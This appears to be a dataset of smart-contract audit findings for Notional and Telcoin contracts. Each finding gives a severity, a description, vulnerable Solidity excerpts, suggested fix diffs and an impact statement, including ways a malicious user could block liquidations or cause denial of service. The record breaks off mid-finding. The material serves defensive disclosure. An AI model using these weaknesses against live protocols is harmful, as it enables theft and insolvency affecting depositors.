in `SecondaryRewarder.recover()` Using the standard `IERC20.transfer()` If `REWARD_TOKEN` is like `USDT`, it will not be able to transfer out, because this kind of `token` does not return `bool` This will cause it to always `revert`\\n`SecondaryRewarder.recover()` use for\\nAllows the Notional owner to recover any tokens sent to the address or any reward tokens remaining on the contract in excess of the total rewards emitted.\\n```\\n function recover(address token, uint256 amount) external onlyOwner {\\n if (Constants.ETH_ADDRESS == token) {\\n (bool status,) = msg.sender.call{value: amount}("");\\n require(status);\\n } else {\\n IERC20(token).transfer(msg.sender, amount);\\n }\\n }\\n```\\n\\nUsing the standard `IERC20.transfer()` method to execute the transfer A `token` of a type similar to `USDT` has no return value This will cause the execution of the transfer to always fail
```\\n function recover(address token, uint256 amount) external onlyOwner {\\n if (Constants.ETH_ADDRESS == token) {\\n (bool status,) = msg.sender.call{value: amount}("");\\n require(status);\\n } else {\\n// Remove the line below\\n IERC20(token).transfer(msg.sender, amount);\\n// Add the line below\\n GenericToken.safeTransferOut(token,msg.sender,amount);\\n }\\n }\\n```\\n
If `REWARD_TOKEN` is like `USDT`, it will not be able to transfer out.
```\\n function recover(address token, uint256 amount) external onlyOwner {\\n if (Constants.ETH_ADDRESS == token) {\\n (bool status,) = msg.sender.call{value: amount}("");\\n require(status);\\n } else {\\n IERC20(token).transfer(msg.sender, amount);\\n }\\n }\\n```\\n
Malicious users could block liquidation or perform DOS
medium
The current implementation uses a "push" approach where reward tokens are sent to the recipient during every update, which introduces additional attack surfaces that the attackers can exploit. An attacker could intentionally affect the outcome of the transfer to gain a certain advantage or carry out certain attack.\\nThe worst-case scenario is that malicious users might exploit this trick to intentionally trigger a revert when someone attempts to liquidate their unhealthy accounts to block the liquidation, leaving the protocol with bad debts and potentially leading to insolvency if it accumulates.\\nPer the Audit Scope Documentation provided by the protocol team on the contest page, the reward tokens can be any arbitrary ERC20 tokens\\nWe are extending this functionality to allow nTokens to be incentivized by a secondary reward token. On Arbitrum, this will be ARB as a result of the ARB STIP grant. In the future, this may be any arbitrary ERC20 token\\nLine 231 of the `_claimRewards` function below might revert due to various issues such as:\\ntokens with blacklisting features such as USDC (users might intentionally get into the blacklist to achieve certain outcomes)\\ntokens with hook, which allow the target to revert the transaction intentionally\\nunexpected error in the token's contract\\n```\\nFile: SecondaryRewarder.sol\\n function _claimRewards(address account, uint256 nTokenBalanceBefore, uint256 nTokenBalanceAfter) private { \\n uint256 rewardToClaim = _calculateRewardToClaim(account, nTokenBalanceBefore, accumulatedRewardPerNToken); \\n\\n // Precision here is:\\n // nTokenBalanceAfter (INTERNAL_TOKEN_PRECISION) \\n // accumulatedRewardPerNToken (INCENTIVE_ACCUMULATION_PRECISION) \\n // DIVIDE BY\\n // INTERNAL_TOKEN_PRECISION \\n // => INCENTIVE_ACCUMULATION_PRECISION (1e18) \\n rewardDebtPerAccount[account] = nTokenBalanceAfter \\n .mul(accumulatedRewardPerNToken)\\n .div(uint256(Constants.INTERNAL_TOKEN_PRECISION))\\n .toUint128(); \\n\\n if (0 < rewardToClaim) { \\n GenericToken.safeTransferOut(REWARD_TOKEN, account, rewardToClaim); \\n emit RewardTransfer(REWARD_TOKEN, account, rewardToClaim);\\n }\\n }\\n```\\n\\nIf a revert occurs, the following functions are affected:\\n```\\n_claimRewards -> claimRewardsDirect\\n\\n_claimRewards -> claimRewards -> Incentives.claimIncentives\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler._finalize\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler._finalize -> Used by many functions\\n\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler.claimIncentivesManual\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler.claimIncentivesManual -> nTokenAction.nTokenClaimIncentives (External)\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler.claimIncentivesManual -> nTokenAction.nTokenClaimIncentives (External) -> claimNOTE (External)\\n```\\n
The current implementation uses a "push" approach where reward tokens are sent to the recipient during every update, which introduces additional attack surfaces that the attackers can exploit.\\nConsider adopting a pull method for users to claim their rewards instead so that the transfer of reward tokens is disconnected from the updating of reward balances.
Many of the core functionalities of the protocol will be affected by the revert. Specifically, the `BalancerHandler._finalize` has the most impact as this function is called by almost every critical functionality of the protocol, including deposit, withdrawal, and liquidation.\\nThe worst-case scenario is that malicious users might exploit this trick to intentionally trigger a revert when someone attempts to liquidate their unhealthy accounts to block the liquidation, leaving the protocol with bad debts and potentially leading to insolvency if it accumulates.
```\\nFile: SecondaryRewarder.sol\\n function _claimRewards(address account, uint256 nTokenBalanceBefore, uint256 nTokenBalanceAfter) private { \\n uint256 rewardToClaim = _calculateRewardToClaim(account, nTokenBalanceBefore, accumulatedRewardPerNToken); \\n\\n // Precision here is:\\n // nTokenBalanceAfter (INTERNAL_TOKEN_PRECISION) \\n // accumulatedRewardPerNToken (INCENTIVE_ACCUMULATION_PRECISION) \\n // DIVIDE BY\\n // INTERNAL_TOKEN_PRECISION \\n // => INCENTIVE_ACCUMULATION_PRECISION (1e18) \\n rewardDebtPerAccount[account] = nTokenBalanceAfter \\n .mul(accumulatedRewardPerNToken)\\n .div(uint256(Constants.INTERNAL_TOKEN_PRECISION))\\n .toUint128(); \\n\\n if (0 < rewardToClaim) { \\n GenericToken.safeTransferOut(REWARD_TOKEN, account, rewardToClaim); \\n emit RewardTransfer(REWARD_TOKEN, account, rewardToClaim);\\n }\\n }\\n```\\n
Unexpected behavior when calling certain ERC4626 functions
medium
Unexpected behavior could occur when certain ERC4626 functions are called during the time windows when the fCash has matured but is not yet settled.\\nWhen the fCash has matured, the global settlement does not automatically get executed. The global settlement will only be executed when the first account attempts to settle its own account. The code expects the `pr.supplyFactor` to return zero if the global settlement has not been executed yet after maturity.\\nPer the comment at Line 215, the design of the `_getMaturedCashValue` function is that it expects that if fCash has matured AND the fCash has not yet been settled, the `pr.supplyFactor` will be zero. In this case, the cash value will be zero.\\n```\\nFile: wfCashBase.sol\\n function _getMaturedCashValue(uint256 fCashAmount) internal view returns (uint256) { \\n if (!hasMatured()) return 0; \\n // If the fCash has matured we use the cash balance instead.\\n (uint16 currencyId, uint40 maturity) = getDecodedID(); \\n PrimeRate memory pr = NotionalV2.getSettlementRate(currencyId, maturity); \\n\\n // fCash has not yet been settled\\n if (pr.supplyFactor == 0) return 0; \\n..SNIP..\\n```\\n\\nDuring the time window where the fCash has matured, and none of the accounts triggered an account settlement, the `_getMaturedCashValue` function at Line 33 below will return zero, which will result in the `totalAssets()` function returning zero.\\n```\\nFile: wfCashERC4626.sol\\n function totalAssets() public view override returns (uint256) {\\n if (hasMatured()) {\\n // We calculate the matured cash value of the total supply of fCash. This is\\n // not always equal to the cash balance held by the wrapper contract.\\n uint256 primeCashValue = _getMaturedCashValue(totalSupply());\\n require(primeCashValue < uint256(type(int256).max));\\n int256 externalValue = NotionalV2.convertCashBalanceToExternal(\\n getCurrencyId(), int256(primeCashValue), true\\n );\\n return externalValue >= 0 ? uint256(externalValue) : 0;\\n..SNIP..\\n```\\n
Document the unexpected behavior of the affected functions that could occur during the time windows when the fCash has matured but is not yet settled so that anyone who calls these functions is aware of them.
The `totalAssets()` function is utilized by key ERC4626 functions within the wrapper, such as the following functions. The side effects of this issue are documented below:\\n`convertToAssets` (Impact = returned value is always zero assets regardless of the inputs)\\n`convertToAssets` > `previewRedeem` (Impact = returned value is always zero assets regardless of the inputs)\\n`convertToAssets` > `previewRedeem` > `maxWithdraw` (Impact = max withdrawal is always zero)\\n`convertToShares` (Impact = Division by zero error, Revert)\\n`convertToShares` > `previewWithdraw` (Impact = Revert)\\nIn addition, any external protocol integrating with wfCash will be vulnerable within this time window as an invalid result (zero) is returned, or a revert might occur. For instance, any external protocol that relies on any of the above-affected functions for computing the withdrawal/minting amount or collateral value will be greatly impacted as the value before the maturity might be 10000, but it will temporarily reset to zero during this time window. Attackers could take advantage of this time window to perform malicious actions.
```\\nFile: wfCashBase.sol\\n function _getMaturedCashValue(uint256 fCashAmount) internal view returns (uint256) { \\n if (!hasMatured()) return 0; \\n // If the fCash has matured we use the cash balance instead.\\n (uint16 currencyId, uint40 maturity) = getDecodedID(); \\n PrimeRate memory pr = NotionalV2.getSettlementRate(currencyId, maturity); \\n\\n // fCash has not yet been settled\\n if (pr.supplyFactor == 0) return 0; \\n..SNIP..\\n```\\n
getOracleData() maxExternalDeposit not accurate
medium
in `getOracleData()` The calculation of `maxExternalDeposit` lacks consideration for `reserve.accruedToTreasury`. This leads to `maxExternalDeposit` being too large, causing `Treasury.rebalance()` to fail.\\nin `getOracleData()`\\n```\\n function getOracleData() external view override returns (OracleData memory oracleData) {\\n// rest of code\\n (/* */, uint256 supplyCap) = IPoolDataProvider(POOL_DATA_PROVIDER).getReserveCaps(underlying);\\n // Supply caps are returned as whole token values\\n supplyCap = supplyCap * UNDERLYING_PRECISION;\\n uint256 aTokenSupply = IPoolDataProvider(POOL_DATA_PROVIDER).getATokenTotalSupply(underlying);\\n\\n // If supply cap is zero, that means there is no cap on the pool\\n if (supplyCap == 0) {\\n oracleData.maxExternalDeposit = type(uint256).max;\\n } else if (supplyCap <= aTokenSupply) {\\n oracleData.maxExternalDeposit = 0;\\n } else {\\n // underflow checked as consequence of if / else statement\\n oracleData.maxExternalDeposit = supplyCap - aTokenSupply;\\n }\\n```\\n\\nHowever, AAVE's restrictions are as follows: ValidationLogic.sol#L81-L88\\n```\\n require(\\n supplyCap == 0 ||\\n ((IAToken(reserveCache.aTokenAddress).scaledTotalSupply() +\\n uint256(reserve.accruedToTreasury)).rayMul(reserveCache.nextLiquidityIndex) + amount) <=\\n supplyCap * (10 ** reserveCache.reserveConfiguration.getDecimals()),\\n Errors.SUPPLY_CAP_EXCEEDED\\n );\\n }\\n```\\n\\nThe current implementation lacks subtraction of `uint256(reserve.accruedToTreasury)).rayMul(reserveCache.nextLiquidityIndex)`.
subtract `uint256(reserve.accruedToTreasury)).rayMul(reserveCache.nextLiquidityIndex)`
An overly large `maxExternalDeposit` may cause `rebalance()` to be unable to execute.
```\\n function getOracleData() external view override returns (OracleData memory oracleData) {\\n// rest of code\\n (/* */, uint256 supplyCap) = IPoolDataProvider(POOL_DATA_PROVIDER).getReserveCaps(underlying);\\n // Supply caps are returned as whole token values\\n supplyCap = supplyCap * UNDERLYING_PRECISION;\\n uint256 aTokenSupply = IPoolDataProvider(POOL_DATA_PROVIDER).getATokenTotalSupply(underlying);\\n\\n // If supply cap is zero, that means there is no cap on the pool\\n if (supplyCap == 0) {\\n oracleData.maxExternalDeposit = type(uint256).max;\\n } else if (supplyCap <= aTokenSupply) {\\n oracleData.maxExternalDeposit = 0;\\n } else {\\n // underflow checked as consequence of if / else statement\\n oracleData.maxExternalDeposit = supplyCap - aTokenSupply;\\n }\\n```\\n
getTargetExternalLendingAmount() when targetUtilization == 0 no check whether enough externalUnderlyingAvailableForWithdraw
medium
in `getTargetExternalLendingAmount()` When `targetUtilization == 0`, it directly returns `targetAmount=0`. It lacks the judgment of whether there is enough `externalUnderlyingAvailableForWithdraw`. This may cause `_rebalanceCurrency()` to `revert` due to insufficient balance for `withdraw`.\\nwhen `setRebalancingTargets()` , we can setting all the targets to zero to immediately exit money it will call `_rebalanceCurrency() -> _isExternalLendingUnhealthy() -> getTargetExternalLendingAmount()`\\n```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n // Short circuit a zero target\\n if (rebalancingTargetData.targetUtilization == 0) return 0;\\n\\n// rest of code.\\n if (targetAmount < oracleData.currentExternalUnderlyingLend) {\\n uint256 forRedemption = oracleData.currentExternalUnderlyingLend - targetAmount;\\n if (oracleData.externalUnderlyingAvailableForWithdraw < forRedemption) {\\n // increase target amount so that redemptions amount match externalUnderlyingAvailableForWithdraw\\n targetAmount = targetAmount.add(\\n // unchecked - is safe here, overflow is not possible due to above if conditional\\n forRedemption - oracleData.externalUnderlyingAvailableForWithdraw\\n );\\n }\\n }\\n```\\n\\nWhen `targetUtilization==0`, it returns `targetAmount ==0`. It lacks the other judgments of whether the current `externalUnderlyingAvailableForWithdraw` is sufficient. Exceeding `externalUnderlyingAvailableForWithdraw` may cause `_rebalanceCurrency()` to revert.\\nFor example: `currentExternalUnderlyingLend = 100` `externalUnderlyingAvailableForWithdraw = 99` If `targetUtilization` is modified to `0`, then `targetAmount` should be `1`, not `0`. `0` will cause an error due to insufficient available balance for withdrawal.\\nSo, it should still try to withdraw as much deposit as possible first, wait for replenishment, and then withdraw the remaining deposit until the deposit is cleared.
Remove `targetUtilization == 0` directly returning 0.\\nThe subsequent logic of the method can handle `targetUtilization == 0` normally and will not cause an error.\\n```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n // Short circuit a zero target\\n// Remove the line below\\n if (rebalancingTargetData.targetUtilization == 0) return 0;\\n```\\n
A too small `targetAmount` may cause AAVE withdraw to fail, thereby causing the inability to `setRebalancingTargets()` to fail.
```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n // Short circuit a zero target\\n if (rebalancingTargetData.targetUtilization == 0) return 0;\\n\\n// rest of code.\\n if (targetAmount < oracleData.currentExternalUnderlyingLend) {\\n uint256 forRedemption = oracleData.currentExternalUnderlyingLend - targetAmount;\\n if (oracleData.externalUnderlyingAvailableForWithdraw < forRedemption) {\\n // increase target amount so that redemptions amount match externalUnderlyingAvailableForWithdraw\\n targetAmount = targetAmount.add(\\n // unchecked - is safe here, overflow is not possible due to above if conditional\\n forRedemption - oracleData.externalUnderlyingAvailableForWithdraw\\n );\\n }\\n }\\n```\\n
getTargetExternalLendingAmount() targetAmount may far less than the correct value
medium
When calculating `ExternalLending.getTargetExternalLendingAmount()`, it restricts `targetAmount` greater than `oracleData.maxExternalDeposit`. However, it does not take into account that `oracleData.maxExternalDeposit` includes the protocol deposit `currentExternalUnderlyingLend` This may result in the returned quantity being far less than the correct quantity.\\nin `getTargetExternalLendingAmount()` It restricts `targetAmount` greater than `oracleData.maxExternalDeposit`.\\n```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n// rest of code\\n\\n targetAmount = SafeUint256.min(\\n // totalPrimeCashInUnderlying and totalPrimeDebtInUnderlying are in 8 decimals, convert it to native\\n // token precision here for accurate comparison. No underflow possible since targetExternalUnderlyingLend\\n // is floored at zero.\\n uint256(underlyingToken.convertToExternal(targetExternalUnderlyingLend)),\\n // maxExternalUnderlyingLend is limit enforced by setting externalWithdrawThreshold\\n // maxExternalDeposit is limit due to the supply cap on external pools\\n SafeUint256.min(maxExternalUnderlyingLend, oracleData.maxExternalDeposit)\\n );\\n```\\n\\nthis is : `targetAmount = min(targetExternalUnderlyingLend, maxExternalUnderlyingLend, oracleData.maxExternalDeposit)`\\nThe problem is that when calculating `oracleData.maxExternalDeposit`, it does not exclude the existing deposit `currentExternalUnderlyingLend` of the current protocol.\\nFor example: `currentExternalUnderlyingLend = 100` `targetExternalUnderlyingLend = 100` `maxExternalUnderlyingLend = 10000` `oracleData.maxExternalDeposit = 0` (All AAVE deposits include the current deposit currentExternalUnderlyingLend)\\nIf according to the current calculation result: `targetAmount=0`, this will result in needing to withdraw `100`. (currentExternalUnderlyingLend - targetAmount)\\nIn fact, only when the calculation result needs to increase the `deposit` (targetAmount > currentExternalUnderlyingLend), it needs to be restricted by `maxExternalDeposit`.\\nThe correct one should be neither deposit nor withdraw, that is, `targetAmount=currentExternalUnderlyingLend = 100`.
Only when `targetAmount > currentExternalUnderlyingLend` is a deposit needed, it should be considered that it cannot exceed `oracleData.maxExternalDeposit`\\n```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n// rest of code\\n\\n// Remove the line below\\n targetAmount = SafeUint256.min(\\n// Remove the line below\\n // totalPrimeCashInUnderlying and totalPrimeDebtInUnderlying are in 8 decimals, convert it to native\\n// Remove the line below\\n // token precision here for accurate comparison. No underflow possible since targetExternalUnderlyingLend\\n// Remove the line below\\n // is floored at zero.\\n// Remove the line below\\n uint256(underlyingToken.convertToExternal(targetExternalUnderlyingLend)),\\n// Remove the line below\\n // maxExternalUnderlyingLend is limit enforced by setting externalWithdrawThreshold\\n// Remove the line below\\n // maxExternalDeposit is limit due to the supply cap on external pools\\n// Remove the line below\\n SafeUint256.min(maxExternalUnderlyingLend, oracleData.maxExternalDeposit)\\n// Remove the line below\\n );\\n\\n// Add the line below\\n targetAmount = SafeUint256.min(uint256(underlyingToken.convertToExternal(targetExternalUnderlyingLend)),maxExternalUnderlyingLend);\\n// Add the line below\\n if (targetAmount > oracleData.currentExternalUnderlyingLend) { //when deposit , must check maxExternalDeposit\\n// Add the line below\\n uint256 forDeposit = targetAmount // Remove the line below\\n oracleData.currentExternalUnderlyingLend;\\n// Add the line below\\n if (forDeposit > oracleData.maxExternalDeposit) {\\n// Add the line below\\n targetAmount = targetAmount.sub(\\n// Add the line below\\n forDeposit // Remove the line below\\n oracleData.maxExternalDeposit\\n// Add the line below\\n ); \\n// Add the line below\\n }\\n// Add the line below\\n }\\n```\\n
A too small `targetAmount` will cause the withdrawal of deposits that should not be withdrawn, damaging the interests of the protocol.
```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n// rest of code\\n\\n targetAmount = SafeUint256.min(\\n // totalPrimeCashInUnderlying and totalPrimeDebtInUnderlying are in 8 decimals, convert it to native\\n // token precision here for accurate comparison. No underflow possible since targetExternalUnderlyingLend\\n // is floored at zero.\\n uint256(underlyingToken.convertToExternal(targetExternalUnderlyingLend)),\\n // maxExternalUnderlyingLend is limit enforced by setting externalWithdrawThreshold\\n // maxExternalDeposit is limit due to the supply cap on external pools\\n SafeUint256.min(maxExternalUnderlyingLend, oracleData.maxExternalDeposit)\\n );\\n```\\n
`wfCashERC4626`
medium
The `wfCash` vault is credited less prime cash than the `wfCash` it mints to the depositor when its underlying asset is a fee-on-transfer token. This leads to the vault being insolvent because it has issued more shares than can be redeemed.\\n```\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION);\\n require(fCashAmountExternal <= depositAmountExternal);\\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);\\n } else if (isETH || hasTransferFee || getCashBalance() > 0) {\\n```\\n\\n```\\n } else {\\n // In the case of deposits, we use a balance before and after check\\n // to ensure that we record the proper balance change.\\n actualTransferExternal = GenericToken.safeTransferIn(\\n underlying.tokenAddress, account, underlyingExternalDeposit\\n ).toInt();\\n }\\n\\n netPrimeSupplyChange = _postTransferPrimeCashUpdate(\\n account, currencyId, actualTransferExternal, underlying, primeRate\\n );\\n```\\n\\n```\\n // Mints ERC20 tokens for the receiver\\n _mint(receiver, fCashAmount);\\n```\\n\\nIn the case of lending at 0% interest, `fCashAmount` is equal to `depositAmount` but at 1e8 precision.\\nTo simplify the example, let us assume that there are no other depositors. When the sole depositor redeems all their `wfCash` shares at maturity, they will be unable to redeem all their shares because the `wfCash` vault does not hold enough prime cash.
Consider adding the following:\\nA flag in `wfCashERC4626` that signals that the vault's asset is a fee-on-transfer token.\\nIn `wfCashERC4626._previewMint()` and `wfCashERC46262._previewDeposit`, all calculations related to `assets` should account for the transfer fee of the token.
Although the example used to display the vulnerability is for the case of lending at 0% interest, the issue exists for minting any amount of shares.\\nThe `wfCashERC4626` vault will become insolvent and unable to buy back all shares. The larger the total amount deposited, the larger the deficit. The deficit is equal to the transfer fee. Given a total deposit amount of 100M USDT and a transfer fee of 2% (assuming a transfer fee was set and enabled for USDT), 2M USDT will be the deficit.\\nThe last depositors to redeem their shares will be shouldering the loss.
```\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION);\\n require(fCashAmountExternal <= depositAmountExternal);\\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);\\n } else if (isETH || hasTransferFee || getCashBalance() > 0) {\\n```\\n
`ExternalLending`
medium
When the Treasury rebalances and has to redeem aTokens from AaveV3, it checks that the actual amount withdrawn is greater than or equal to the set `withdrawAmount`. This check will always fail for fee-on-transfer tokens since the `withdrawAmount` does not account for the transfer fee.\\n```\\n address[] memory targets = new address[](UNDERLYING_IS_ETH ? 2 : 1);\\n bytes[] memory callData = new bytes[](UNDERLYING_IS_ETH ? 2 : 1);\\n targets[0] = LENDING_POOL;\\n callData[0] = abi.encodeWithSelector(\\n ILendingPool.withdraw.selector, underlyingToken, withdrawAmount, address(NOTIONAL)\\n );\\n\\n if (UNDERLYING_IS_ETH) {\\n // Aave V3 returns WETH instead of native ETH so we have to unwrap it here\\n targets[1] = address(Deployments.WETH);\\n callData[1] = abi.encodeWithSelector(WETH9.withdraw.selector, withdrawAmount);\\n }\\n\\n data = new RedeemData[](1);\\n // Tokens with less than or equal to 8 decimals sometimes have off by 1 issues when depositing\\n // into Aave V3. Aave returns one unit less than has been deposited. This adjustment is applied\\n // to ensure that this unit of token is credited back to prime cash holders appropriately.\\n uint8 rebasingTokenBalanceAdjustment = UNDERLYING_DECIMALS <= 8 ? 1 : 0;\\n data[0] = RedeemData(\\n targets, callData, withdrawAmount, ASSET_TOKEN, rebasingTokenBalanceAdjustment\\n );\\n```\\n\\nNote that the third field in the `RedeemData` struct is the `expectedUnderlying` field which is set to the `withdrawAmount` and that `withdrawAmount` is a value greater than zero.\\n```\\n for (uint256 j; j < data.targets.length; j++) {\\n GenericToken.executeLowLevelCall(data.targets[j], 0, data.callData[j]);\\n }\\n\\n // Ensure that we get sufficient underlying on every redemption\\n uint256 newUnderlyingBalance = TokenHandler.balanceOf(underlyingToken, address(this));\\n uint256 underlyingBalanceChange = newUnderlyingBalance.sub(oldUnderlyingBalance);\\n // If the call is not the final redemption, then expectedUnderlying should\\n // be set to zero.\\n require(data.expectedUnderlying <= underlyingBalanceChange);\\n```\\n\\n```\\nredeemAmounts[0] = currentAmount - targetAmount;\\n```\\n\\nIt does not account for transfer fees. In effect, that check will always revert when the underlying being withdrawn is a fee-on-transfer token.
When computing for the `withdrawAmount / data.expectedUnderlying`, it should account for the transfer fees. The pseudocode for the computation may look like so:\\n```\\nwithdrawAmount = currentAmount - targetAmount\\nif (underlyingToken.hasTransferFee) {\\n withdrawAmount = withdrawAmount / (100% - underlyingToken.transferFeePercent)\\n}\\n```\\n
```\\n uint256 withdrawAmount = uint256(netTransferExternal.neg());\\n ExternalLending.redeemMoneyMarketIfRequired(currencyId, underlying, withdrawAmount);\\n```\\n\\nThis means that these tokens can only be deposited into AaveV3 but can never redeemed. This can lead to insolvency of the protocol.
```\\n address[] memory targets = new address[](UNDERLYING_IS_ETH ? 2 : 1);\\n bytes[] memory callData = new bytes[](UNDERLYING_IS_ETH ? 2 : 1);\\n targets[0] = LENDING_POOL;\\n callData[0] = abi.encodeWithSelector(\\n ILendingPool.withdraw.selector, underlyingToken, withdrawAmount, address(NOTIONAL)\\n );\\n\\n if (UNDERLYING_IS_ETH) {\\n // Aave V3 returns WETH instead of native ETH so we have to unwrap it here\\n targets[1] = address(Deployments.WETH);\\n callData[1] = abi.encodeWithSelector(WETH9.withdraw.selector, withdrawAmount);\\n }\\n\\n data = new RedeemData[](1);\\n // Tokens with less than or equal to 8 decimals sometimes have off by 1 issues when depositing\\n // into Aave V3. Aave returns one unit less than has been deposited. This adjustment is applied\\n // to ensure that this unit of token is credited back to prime cash holders appropriately.\\n uint8 rebasingTokenBalanceAdjustment = UNDERLYING_DECIMALS <= 8 ? 1 : 0;\\n data[0] = RedeemData(\\n targets, callData, withdrawAmount, ASSET_TOKEN, rebasingTokenBalanceAdjustment\\n );\\n```\\n
`StakingRewardsManager::topUp(...)` Misallocates Funds to `StakingRewards` Contracts
high
The `StakingRewardsManager::topUp(...)` contract exhibits an issue where the specified `StakingRewards` contracts are not topped up at the correct indices, resulting in an incorrect distribution to different contracts.\\nThe `StakingRewardsManager::topUp(...)` function is designed to top up multiple `StakingRewards` contracts simultaneously by taking the indices of the contract's addresses in the `StakingRewardsManager::stakingContracts` array. However, the flaw lies in the distribution process:\\n```\\n function topUp(\\n address source,\\n uint256[] memory indices\\n ) external onlyRole(EXECUTOR_ROLE) {\\n for (uint i = 0; i < indices.length; i++) {\\n // get staking contract and config\\n StakingRewards staking = stakingContracts[i];\\n StakingConfig memory config = stakingConfigs[staking];\\n\\n // will revert if block.timestamp <= periodFinish\\n staking.setRewardsDuration(config.rewardsDuration);\\n\\n // pull tokens from owner of this contract to fund the staking contract\\n rewardToken.transferFrom(\\n source,\\n address(staking),\\n config.rewardAmount\\n );\\n\\n // start periods\\n staking.notifyRewardAmount(config.rewardAmount);\\n\\n emit ToppedUp(staking, config);\\n }\\n }\\n```\\n\\nGitHub: [254-278]\\nThe rewards are not appropriately distributed to the `StakingRewards` contracts at the specified indices. Instead, they are transferred to the contracts at the loop indices. For instance, if intending to top up contracts at indices `[1, 2]`, the actual top-up occurs at indices `[0, 1]`.
It is recommended to do the following changes:\\n```\\n function topUp(\\n address source,\\n uint256[] memory indices\\n ) external onlyRole(EXECUTOR_ROLE) {\\n for (uint i = 0; i < indices.length; i// Add the line below\\n// Add the line below\\n) {\\n // get staking contract and config\\n// Remove the line below\\n StakingRewards staking = stakingContracts[i];\\n// Add the line below\\n StakingRewards staking = stakingContracts[indices[i]];\\n StakingConfig memory config = stakingConfigs[staking];\\n\\n // will revert if block.timestamp <= periodFinish\\n staking.setRewardsDuration(config.rewardsDuration);\\n\\n // pull tokens from owner of this contract to fund the staking contract\\n rewardToken.transferFrom(\\n source,\\n address(staking),\\n config.rewardAmount\\n );\\n\\n // start periods\\n staking.notifyRewardAmount(config.rewardAmount);\\n\\n emit ToppedUp(staking, config);\\n }\\n }\\n```\\n
The consequence of this vulnerability is that rewards will be distributed to the incorrect staking contract, leading to potential misallocation and unintended outcomes
```\\n function topUp(\\n address source,\\n uint256[] memory indices\\n ) external onlyRole(EXECUTOR_ROLE) {\\n for (uint i = 0; i < indices.length; i++) {\\n // get staking contract and config\\n StakingRewards staking = stakingContracts[i];\\n StakingConfig memory config = stakingConfigs[staking];\\n\\n // will revert if block.timestamp <= periodFinish\\n staking.setRewardsDuration(config.rewardsDuration);\\n\\n // pull tokens from owner of this contract to fund the staking contract\\n rewardToken.transferFrom(\\n source,\\n address(staking),\\n config.rewardAmount\\n );\\n\\n // start periods\\n staking.notifyRewardAmount(config.rewardAmount);\\n\\n emit ToppedUp(staking, config);\\n }\\n }\\n```\\n
Wrong parameter when retrieving causes a complete DoS of the protocol
high
A wrong parameter in the `_retrieve()` prevents the protocol from properly interacting with Sablier, causing a Denial of Service in all functions calling `_retrieve()`.\\nThe `CouncilMember` contract is designed to interact with a Sablier stream. As time passes, the Sablier stream will unlock more TELCOIN tokens which will be available to be retrieved from `CouncilMember`.\\nThe `_retrieve()` internal function will be used in order to fetch the rewards from the stream and distribute them among the Council Member NFT holders (snippet reduced for simplicity):\\n```\\n// CouncilMember.sol\\n\\nfunction _retrieve() internal {\\n // rest of code\\n // Execute the withdrawal from the _target, which might be a Sablier stream or another protocol\\n _stream.execute(\\n _target,\\n abi.encodeWithSelector(\\n ISablierV2ProxyTarget.withdrawMax.selector, \\n _target, \\n _id,\\n address(this)\\n )\\n );\\n\\n // rest of code\\n }\\n```\\n\\nThe most important part in `_retrieve()` regarding the vulnerability that we'll dive into is the `_stream.execute()` interaction and the params it receives. In order to understand such interaction, we first need understand the importance of the `_stream` and the `_target` variables.\\nSablier allows developers to integrate Sablier via Periphery contracts, which prevents devs from dealing with the complexity of directly integrating Sablier's Core contracts. Telcoin developers have decided to use these periphery contracts. Concretely, the following contracts have been used:\\nNOTE: It is important to understand that the actual lockup linear stream will be deployed as well. The difference is that the Telcoin protocol will not interact with that contract directly. Instead, the PRBProxy and proxy target contracts will be leveraged to perform such interactions.\\nKnowing this, we can now move on to explaining Telcoin's approach to withdrawing the available tokens from the stream. As seen in the code snippet above, the `_retrieve()` function will perform two steps to actually perform a withdraw from the stream:\\nIt will first call the _stream's `execute()` function (remember `_stream` is a PRBProxy). This function receives a `target` and some `data` as parameter, and performs a delegatecall aiming at the target:\\nIn the `_retrieve()` function, the target where the call will be forwarded to is the `_target` parameter, which is a ProxyTarget contract. Concretely, the delegatecall function that will be triggered in the ProxyTarget will be withdrawMax():\\nAs we can see, the `withdrawMax()` function has as parameters the `lockup` 